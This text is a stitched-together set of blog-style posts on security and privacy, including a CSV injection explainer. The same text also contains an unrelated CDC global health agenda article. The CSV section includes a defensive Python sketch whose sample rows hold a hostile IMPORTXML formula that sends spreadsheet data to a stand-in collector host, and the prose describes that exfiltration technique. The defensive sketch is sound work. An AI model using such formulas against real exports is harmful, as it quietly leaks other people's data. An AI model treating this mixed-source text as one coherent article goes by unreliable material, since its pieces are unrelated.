Quantum computing visual explainer

Quantum computing promises a higher level of processing power over current computers, but it comes with its own challenges with implementation. When it comes to fruition, it’ll also break current privacy measures like your banking password. Financial Times explains how this works with a fine set of animations and illustrations.


Inference of key shape from the sound it makes in the lock

Researchers from the National University of Singapore found a way to infer key shape based on the sound the lock makes when you insert the key.

First they capture a sound recording with a standard microphone. Then they run the audio file through software to filter out the metallic clicks. This provides a time series from which they can infer likely keys.

Soundarya Ramesh presented the work at HotMobile 2020 in the talk below:

Oh to be back in graduate school again. [via kottke]


To get your personal data, provide more personal data

File another one under the sounds-good-on-paper-but-really-challenging-in-practice. Kashmir Hill, for The New York Times, describes the challenges of new laws that allow users to request the data that companies collect on them:

Since then, two groups of researchers have demonstrated that it’s possible to fool the systems created to comply with G.D.P.R. to get someone else’s personal information.

One of the researchers, James Pavur, 24, a doctoral student at Oxford University, filed data requests on behalf of his research partner and wife, Casey Knerr, at 150 companies using information that was easily found for her online, such as her mailing address, email address and phone number. To make the requests, he created an email address that was a variation on Ms. Knerr’s name. A quarter of the companies sent him her file.

“I got her Social Security number, high school grades, a good chunk of information about her credit card,” Mr. Pavur said. “A threat intelligence company sent me all her user names and passwords that had been leaked.”

Yay.

I’m not saying these new laws are bad, but maybe get yourself a good password manager and change all those duplicate passwords.


Dangers of CSV injection

George Mauer highlights how a hacker might access other people’s data by putting an equal sign in a CSV file, so that an import to Microsoft or Google Sheets runs a value as a formula, even if it’s quoted as a string.

The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending as a querystring of spreadsheet data. Now they can open up their server log and bam! Data that isn’t theirs. Try it yourself with a Requestb.in.

The ultra sinister thing here? No warnings, no popups, no reason to think that anything is amiss. The attacker just enters a similarly formatted time/issue/whatever entry, eventually an administrator attempts to view a CSV export and all that limited-access data is immediately, and quietly sent away.

Oh goody.
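A defensive sketch of the export side, added here as an example and not taken from the original post or from Mauer's write-up: it shows that CSV quoting alone leaves the leading `=` in place, and neutralizes cells that begin with a formula trigger character before writing. The function names, the trigger list (`=`, `+`, `-`, `@`, tab, carriage return) and the sample rows are assumptions constructed for illustration.

```python
import csv
import io
import re

# Leading characters a spreadsheet may treat as the start of a formula (assumed list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# Plain signed numbers such as -12.5 are left alone so numeric columns stay numeric.
PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def neutralize_cell(value):
    """Return the cell as text that no longer begins with a formula trigger."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS) and not PLAIN_NUMBER.fullmatch(text):
        # With a leading apostrophe the cell starts with a non-trigger character.
        return "'" + text
    return text


def export_csv(rows, neutralize=True):
    """Serialize rows to CSV with every field quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if neutralize else c for c in row])
    return buf.getvalue()


def first_chars(csv_text):
    """Parse the CSV as an importer would; return the first character of each cell."""
    return [[cell[:1] for cell in row] for row in csv.reader(io.StringIO(csv_text))]


# Constructed sample: a time-tracking export in which one user-entered note is hostile.
SAMPLE_ROWS = [
    ["user", "hours", "note"],
    ["alice", "-1.5", "correction for Monday"],
    ["mallory", "2", '=IMPORTXML("https://collector.example.invalid/?d=" & A2, "//x")'],
    ["bob", "3", "@home, +1 hour travel"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS, neutralize=False))  # quoted, but still starts with =
    print(export_csv(SAMPLE_ROWS))                    # hostile cells now start with '
```

The apostrophe may show up as a visible character after import, so apply the neutralization only on exports intended for spreadsheet viewing, not on data exchanged between programs.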


Global Health Security Agenda


The Plan for 2016: CDC and the President’s Global Health Security Agenda

2015 was a powerful reminder that a health threat anywhere is a health threat everywhere.  In 2016, CDC and partners are looking forward to continuing work on the President’s Global Health Security Agenda (GHSA), an initiative led by the Department of Health and Human Services.

In 2012, only 1 in 6 countries reported being fully prepared for disease outbreaks. As the Ebola epidemic in West Africa tragically demonstrated, it is often the countries with the fewest resources who are hit hardest by public health emergencies.  To better protect people everywhere, the United States has committed more than $1 billion over the next 5 years to help 31 countries better prepare for the health impacts of natural and man-made disasters.  More than half of this historic investment will focus on the continent of Africa to help prevent future outbreaks.

There are 31 GHSA countries: Bangladesh • Burkina Faso • Cameroon • Cambodia • Côte d’Ivoire • Democratic Republic of Congo • Ethiopia • Georgia • Ghana • Guinea • Haiti • India • Indonesia • Jordan • Kazakhstan • Kenya • Laos • Liberia • Malaysia • Mali • Mozambique • Pakistan • Peru • Rwanda • Senegal • Sierra Leone • Tanzania • Thailand • Uganda • Ukraine • Vietnam

Global Health Security Agenda Goals

The vision of GHSA is to stop disease outbreaks as quickly as possible.  Partners will work together to build a global network that can respond rapidly and effectively to disease outbreaks and help countries build their own capacity to prevent, detect, and respond to public health emergencies.

The GHSA focuses on accelerating progress toward a world safe from disease threats by supporting enhanced surveillance and biosecurity systems, immunization campaigns, and curtailing antimicrobial resistance. Establishing national laboratory and disease reporting systems will help detect threats early.  In addition to building epidemiologic and laboratory workforce capacity, GHSA also focuses on incident management system training and establishing emergency operations centers around the globe.

As President Obama said at the Global Health Security Agenda Summit in 2014, “We issued a challenge to ourselves and to all nations of the world to make concrete pledges towards three key goals:  prevent, detect, and respond.  We have to prevent outbreaks by reducing risks.  We need to detect threats immediately wherever they arise.  And we need to respond rapidly and effectively when we see something happening, so that we can save lives and avert even larger outbreaks.”

CDC’s Role in Global Health Security
CDC is improving preparedness and response internationally by building close relationships with ministries of health and other public health partners abroad to encourage public health and emergency management capacity building. The agency also provides GHSA countries with resources such as funds, administrative support, and dedicated personnel, including experts in emergency response, electronic surveillance systems, and specific health threats. CDC also links emergency response efforts to recovery efforts to ensure systems and processes that have been put in place for one response can be ready for the next public health emergency.

Ebola has reminded us that  to protect its citizens, each country should be equipped with a core set of public health capabilities to detect a threat when it emerges, respond rapidly and effectively, and prevent it wherever possible. All countries need to be prepared, since disease monitoring and emergency response begin at the local level.  Local responses will be quicker, more efficient, and more cost-effective than responding from a great distance. However, epidemics do not stay within borders and are not the problem of individual countries or regions. GHSA is an important step toward helping build capacity in other countries and ensuring that when national capacities are overwhelmed, the world moves immediately and decisively to contain the outbreak.

Live cyber attack map


Norse monitors cyber attacks in real-time. This is their map of what's going on. (All I hear is pew, pew, pew when I watch it.) [via Boing Boing]


A surveillance system that watches over an entire city

Persistent Surveillance

Technology continues to advance quickly, but the social questions are lagging a bit. Radiolab explores the topic of we-can-but-should-we from the perspective of a surveillance system that watches an entire city twenty-four-seven.

On the one hand, the system allows authorities to find criminals more efficiently. On the other hand, everyone is watched.


Science for the People: Secure Communications

This week, Science for the People is looking at technology for keeping secrets safe from prying eyes and ears. We’re joined by Dan Younger, professor emeritus of mathematics at the University of Waterloo, to discuss the remarkable work of his colleague Bill Tutte, who broke the German Lorenz Code during World War II. We’ll also discuss the cutting edge of quantum security with Physics and Computer Science Professor Shohini Ghose.

*Josh provides research & social media help to Science for the People and is, therefore, completely biased.


Filed under: Follies of the Human Condition Tagged: Bill Tutte, communications, Dan Younger, Lorenz Code, Podcast, quantum, science for the people, security, Shohini Ghose, University of Waterloo, World War II, WWII

Reset the Net

We here at The Finch & Pea are supporters of freedom, privacy, and the open exchange of ideas. We do our best to respect your privacy and the rights of those who produce creative content.

To those ends, we have, from the beginning, published under Creative Commons licenses and have joined in advocacy to oppose government mass surveillance. Today, we are joining a multitude in the Reset the Net campaign to take steps to provide a secure Internet, because our governments will not act to respect our basic freedoms. As security expert Bruce Schneier has noted, organizations like the NSA have chosen to work to make the Internet less secure for all of us, in order to make it easier for them to attack those they perceive as threats.

As a WordPress.com hosted site, we cannot directly affect the addition of security features as recommended by the Reset the Net campaign. Fortunately, we don’t need to. Automattic, the parent company of WordPress.com, has announced that it will be implementing the Reset the Net recommendations by implementing SSL on all its subdomains. They have also created an easy-to-implement Internet Defense League widget you can put on your own WordPress.com site to help spread the word.

We would also encourage you to click the banner at the bottom of the page or the Reset the Net logo to get information about taking back your privacy and helping to make the Internet secure.


Filed under: Items of Interest Tagged: Internet, NSA, security, surveillance